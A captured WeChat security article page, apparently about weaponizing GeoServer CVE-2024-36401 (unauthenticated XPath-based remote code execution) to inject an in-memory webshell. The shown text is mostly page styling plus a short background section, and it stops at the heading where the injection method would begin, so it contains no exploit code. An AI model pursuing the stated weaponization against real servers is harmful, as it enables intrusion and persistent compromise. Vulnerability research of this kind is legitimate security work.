 								<meta name=description content=表达式注入的武器化利用>
 								<meta name=author content=yzddMr6>
 								<meta property=og:title content="GeoServer property RCE注入内存马">
 								<meta property=og:url content="http://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&amp;mid=2247484076&amp;idx=1&amp;sn=4064cb6a006f5cc454b7fb982e8ab9c6&amp;chksm=ce130559f9648c4fd7a60bc35aa5e3d5402b9ac5fbd154c8ed90695c40055dbe83ff9ee5ea38#rd">
 								<meta property=og:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
 								<meta property=og:description content=表达式注入的武器化利用>
 								<meta property=og:site_name content="Weixin Official Accounts Platform">
 								<meta property=og:type content=article>
 								<meta property=og:article:author content=yzddMr6>
 								<meta property=twitter:card content=summary>
 								<meta property=twitter:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
 								<meta property=twitter:title content="GeoServer property RCE注入内存马">
 								<meta property=twitter:creator content=yzddMr6>
 								<meta property=twitter:site content="Weixin Official Accounts Platform">
 								<meta property=twitter:description content=表达式注入的武器化利用>
 								<title>GeoServer property RCE注入内存马</title>
 								<style>@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.93);--weui-MATERIAL-NAVIGATIONBAR:rgba(18,18,18,.9);--weui-MATERIAL-REGULAR:rgba(37,37,37,.6);--weui-MATERIAL-THICK:rgba(34,34,34,.9);--weui-MATERIAL-THIN:rgba(95,95,95,.4);--weui-MATERIAL-TOOLBAR:rgba(35,35,35,.93);--weui-ORANGE-100:#c87d2f;--weui-ORANGE-120:#a06425;--weui-ORANGE-170:#3b250e;--weui-ORANGE-80:#d39758;--weui-ORANGE-90:#cd8943;--weui-ORANGE-BG-100:#bb6000;--weui-ORANGE-BG-110:#a85600;--weui-ORANGE-BG-130:#824300;--weui-ORANGE-BG-90:#c1701a;--weui-ORANGERED-100:#ff6146;--weui-OVERLAY:rgba(0,0,0,.8);--weui-OVERLAY-WHITE:rgba(242,242,242,.8);--weui-PURPLE-100:#8183ff;--weui-PURPLE-120:#6768cc;--weui-PURPLE-170:#26274c;--weui-PURPLE-80:#9a9bff;--weui-PURPLE-90:#8d8fff;--weui-PURPLE-BG-100:#6768cc;--weui-PURPLE-BG-110:#5c5db7;--weui-PURPLE-BG-130:#48498f;--weui-PURPLE-BG-90:#7677d1;--weui-RED-100:#fa5151;--weui-RED-120:#c84040;--weui-RED-170:#4b1818;--weui-RED-80:#fb7373;--weui-RED-90:#fa6262;--weui-RED-BG-100:#cf5148;--weui-RED-BG-110:#ba4940;--weui-RED-BG-130:#913832;--weui-RED-BG-90:#d3625a;--weui-SECONDARY-BG:rgba(255,255,255,.1);--weui-SEPARATOR-0:rgba(255,255,255,.05);--weui-SEPARATOR-1:rgba(255,255,255,.15);--weui-STATELAYER-HOVERED:rgba(0,0,0,.02);--weui-STATELAYER-PRESSED:rgba(255,255,255,.1);--weui-STATELAYER-PRESSEDSTRENGTHENED:rgba(255,255,255,.2);--weui-YELLOW-100:#cc9c00;--weui-YELLOW-120:#a37c00;--weui-YELLOW-170:#3d2f00;--weui-YELLOW-80:#d6af33;--weui-YELLOW-90:#d1a519;--weui-YELLOW-BG-100:#bf9100;--weui-YELLOW-BG-110:#ab8200;--weui-YELLOW-BG-130:#866500;--weui-YELLOW-BG-90:#c59c1a;--weui-FG-HALF:rgba(255,255,255,.6);--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-TEXTGREEN:#259c5c;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-REDORANGE:#ff6146;--weui-TAG-TEXT-BLACK:rgba(255,255,255,.5);--weui-TAG-BACKGROUND-BLACK:rgba(255,255,255,.05);--weui
 								<style>@-webkit-keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@-webkit-keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@-webkit-keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@-webkit-keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@-webkit-keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@-webkit-keyframes txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@media(max-width:1269px){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-wa-hotarea_before:before,.weui-wa-hotarea:after{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}body .weui-wa-hotarea_before:before,body .weui-wa-hotarea:after{pointer-events:auto}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-flex{display:-ms-flexbox}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link:visited{color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;-ms-user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default:not(.weui-btn_disabled):visited{color:var(--weui-FG-0)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiAudioPlaying{30%{-webkit-mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\ 4.251\ 0\ 0\ 0\ 1.23-3\ 4.25\ 4.25\ 0\ 0\ 0-1.23-3L5\ 12l2.97\ 3z\'/%3E%3C/svg%3E);mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\
 								<style>@media(prefers-color-scheme:dark){}@media screen and (min-width:717px){}</style>
 								<style>@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-half-screen-dialog{display:-ms-flexbox;-ms-flex-direction:column}@media only screen and (max-device-height:558px){}.weui-half-screen-dialog__bd{-ms-flex:1;-webkit-hyphens:auto;-ms-hyphens:auto}.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2)+.weui-btn{display:inline-block;vertical-align:top;margin:0 8px;width:120px}@media(prefers-color-scheme:dark){}.weui-half-screen-dialog__btn-area{display:-ms-flexbox;-ms-flex-align:center;-ms-flex-pack:center}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn{margin:0 8px;width:136px}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):first-child,.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn:first-child{margin-left:0}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):last-child,.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn:last-child{margin-right:0}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-5:#2c2c2c;--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-REDORANGE:#ff6146;--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.
 								<style>:root{--articleFontsize:17px}h1{font-weight:400}a{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-drag:none}html{-webkit-text-size-adjust:100%;-webkit-touch-callout:none}body{letter-spacing:.034em;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}body.wx_wap_page{font-family:system-ui,-apple-system,BlinkMacSystemFont,Helvetica Neue,PingFang SC,Hiragino Sans GB,Microsoft YaHei UI,Microsoft YaHei,Arial,sans-serif}.rich_media_content{font-size:var(--articleFontsize);overflow:hidden;text-align:justify}.rich_media_content *{max-width:100% !important;box-sizing:border-box !important;-webkit-box-sizing:border-box !important;word-wrap:break-word !important}.rich_media_content p{clear:both;min-height:1em}body{text-underline-position:under;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none;text-underline-offset:.1em}@supports(-webkit-overflow-scrolling:touch){body{text-underline-position:from-font}}.wxw-img{vertical-align:bottom}.autoTypeSetting24psection>p{margin-top:0;margin-bottom:24px}a{color:var(--weui-LINK)}.rich_media_content{color:var(--weui-FG-HALF)}@media(prefers-color-scheme:dark){}body{color:var(--weui-FG-0)}body.mm_appmsg{box-sizing:border-box;padding-bottom:calc(env(safe-area-inset-bottom) + var(--appmsgPageBottomGap))}body.mm_appmsg .rich_media_extra_discuss{padding-bottom:0}body.mm_appmsg .rich_media_extra_discuss:not(.rich_media_extra_discuss_empty){background-color:var(--weui-BG-2)}body.mm_appmsg.wx_wap_page_primary{background-color:var(--weui-BG-2)}.appmsg_skin_default .rich_media_area_primary{background:var(--weui-BG-2)}.rich_media_area_primary{padding:calc(20px + env(safe-area-inset-top)) calc(var(--appmsgPageGap) + env(safe-area-inset-right))0 calc(var(--appmsgPageGap) + env(safe-area-inset-left))}.rich_media_title{font-size:22px;line-height:1.4;margin-bottom:14px}@supports(-webkit-overflow-scrolling:touch){.rich_media_title{font-weight:700}}.rich_media_meta_list{margin-bottom:22px;line-height:20px;font-size:0;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}.rich_media_meta_list em{font-style:normal}.rich_media_meta_list .weui-wa-hotarea:after{min-height:100%;min-width:100%;padding:5px 4px}.rich_media_meta{display:inline-block;vertical-align:middle;margin:0 10px 10px 0;font-size:15px;-webkit-tap-highlight-color:rgba(0,0,0,0)}.rich_media_meta.appmsg_title_tag{margin-right:8px;overflow:visible}.rich_media_meta_text{color:var(--weui-FG-2)}.rich_media_meta_nickname{position:relative}.rich_media_content{z-index:0}.wx_wap_desktop_fontsize_2 .album_read_card,.wx_wap_desktop_fontsize_2 .rich_media_extra,.wx_wap_desktop_fontsize_2 .rich_media_tool__wrp,.wx_wap_desktop_fontsize_2 .rich_media_wrp{zoom:1}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.wx-root,body{--APPMSGCARD-BG:#fafafa}.wx-root[data-weui-theme=dark]{--APPMSGCARD-BG:#1e1e1e}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-BG:#1e1e1e}}.wx-root,body{--APPMSGCARD-LINE-BG:rgba(0,0,0,.07)}.wx-root[data-weui-theme=dark]{--APPMSGCARD-LINE-BG:rgba(255,255,255,.07)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-LINE-BG:rgba
 								<style>/*!
 								 * WeUI v2.6.4 (https://github.com/weui/weui)
 								 * Copyright 2023 Tencent, Inc.
 								 * Licensed under the MIT license
 								 */@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:hsla(0,0%,100%,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:hsla(0,0%,100%,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:hsla(0,0%,100%,.1)}}html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{line-height:1.6}*{margin:0;padding:0;outline:0}a{text-decoration:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}::-webkit-input-placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}::placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-FG-0:hsla(0,0%,100%,.8);--weui-FG-HALF:hsla(0,0%,100%,.6);--weui-FG-1:hsla(0,0%,100%,.5);--weui-FG-2:hsla(0,0%,100%,.3);--weui-FG-3:hsla(0,0%,100%,.1);--weui-FG-4:hsla(0,0%,100%,.15);--weui-FG-5:hsla(0,0%,100%,.1);--weui-RED:#fa5151;--weui-REDORANGE:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-WHITE:hsla(0,0%,100%,.8);--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-FG:#fff;--weui-BG:#000;--weui-TAG-TEXT-RED:rgba(250,81,81,.6);--weui-TAG-BACKGROUND-RED:rgba(250,81,81,.1);--weui-TAG-TEXT-ORANGE:rgba(250,157,59,.6);--weui-TAG-BACKGROUND-ORANGE:rgba(250,157,59,.1);--weui-TAG-TEXT-GREEN:rgba(6,174,86,.6);--weui-TAG-BACKGROUND-GREEN:rgba(6,174,86,.1);--weui-TAG-TEXT-BLUE:rgba(16,174,255,.6);--weui-TAG-BACKGROUND-BLUE:rgba(16,174,255,.1);--weui-TAG-TEXT-BLACK:hsla(0,0%,100%,.5);--weui-TAG-BACKGROUND-BLACK:hsla(0,0%,100%,.05)}}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-wa-hotarea{position:relative}.weui-wa-hotarea:after,.weui-wa-hotarea_before:before{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link,.weui-link:visited{color:#576b95;color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{position:relative;display:block;margin-left:auto;margin-right:auto;padding:12px 24px;box-sizing:border-box;font-weight:500;font-size:17px;text-align:center;text-decoration:none;color:#fff;line-height:1.41176471;border-radius:8px;-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:rgba(0,0,0,.1);background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default{background-color:var(--weui-FG-5)}.weui-btn_default,.weui-btn_default:not(.weui-btn_disabled):visited{color:rgba(0,0,0,.9);color:var(--weui-FG-0)}.weui-btn_primary{background-color:var(--weui-BRAND)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.weui-btn+.weui-btn{margin-top:16px}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}body{--weui-STEPS-DEFAULT-COLOR:var(--weui-FG-3);--weui-STEPS-HIGHLIGHT-COLOR:var(--weui-BRAND);--weui-STEPS-FONT-SIZE:17;--weui-STEPS-LINEHEIGHT:1.4;--weui-STEPS-DOT-SIZE:calc(8/var(--weui-STEPS-FONT-SIZE)*1em);--weui-STEPS-ICON-SIZE:40;--weui-STEPS-VERTICAL-DOT-GAP:calc((1em - var(--weui-STEPS-DOT-SIZE))/2);--weui-STEPS-HORIZONAL-DOT-GAP:4px}body{--weui-cellMarginLR:16px;--weui-cellPaddingLR:16px}@media(prefers-color-scheme:dark){}.weui-flex{display:-webkit-box;display:-webkit-flex}@media screen and (min-width:352px){}.weui-half-screen-dialog{dis
 								 <body id=activity-detail class="zh_CN wx_wap_page wx_wap_desktop_fontsize_2 mm_appmsg comment_feature discuss_tab appmsg_skin_default appmsg_style_default pages_skin_pc wx_wap_page_primary not_in_mm">
 								<div id=js_article style=position:relative class=rich_media>
 								 <div id=js_top_ad_area class=top_banner></div>
 								 <div id=js_base_container class=rich_media_inner>
 								<div class="wx_row_immersive_stream_wrap sf-hidden" id=js_row_immersive_stream_wrap>
 								</div>
 								 <div id=page-content class=rich_media_area_primary>
 								 <div class=rich_media_area_primary_inner>
 								 <div id=img-content class=rich_media_wrp>
 								 <h1 class=rich_media_title id=activity-name>
 								GeoServer property RCE注入内存马
 								 </h1>
 								 <div id=meta_content class=rich_media_meta_list>
 								 <span id=copyright_logo class="wx_tap_link js_wx_tap_highlight rich_media_meta icon_appmsg_tag appmsg_title_tag weui-wa-hotarea">Original</span>
 								 <span class="rich_media_meta rich_media_meta_text">
 								 <span role=link tabindex=0 id=js_author_name class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" datarewardsn datatimestamp datacanreward=0>yzddMr6</span>
 								 </span>
 								 <span class="rich_media_meta rich_media_meta_nickname" id=profileBt>
 								 <a href=javascript:void(0) class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" id=js_name>
 								 网络安全回收站 </a>
 								 <div id=js_profile_qrcode aria-hidden=true class=profile_container style=display:none>
 								 </div>
 								 </span>
 								 <span id=meta_content_hide_info>
 								 <em id=publish_time class="rich_media_meta rich_media_meta_text">2024-07-04 21:07</em>
 								 <em id=js_ip_wording_wrp class="rich_media_meta rich_media_meta_text" role=option aria-labelledby="js_a11y_op_ip_wording js_ip_wording" style=display:inline-block><span id=js_a11y_op_ip_wording aria-hidden=true></span><span aria-hidden=true id=js_ip_wording>浙江</span></em>
 								 </span>
 								 </div>
 								 <div class="rich_media_content js_underline_content autoTypeSetting24psection" id=js_content><h2 style='margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>背景</h2><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。from https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>本文主要研究如何武器化利用，注入内存马。<h2 style='margin-top:2rem;margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>注入内存马</h2><p 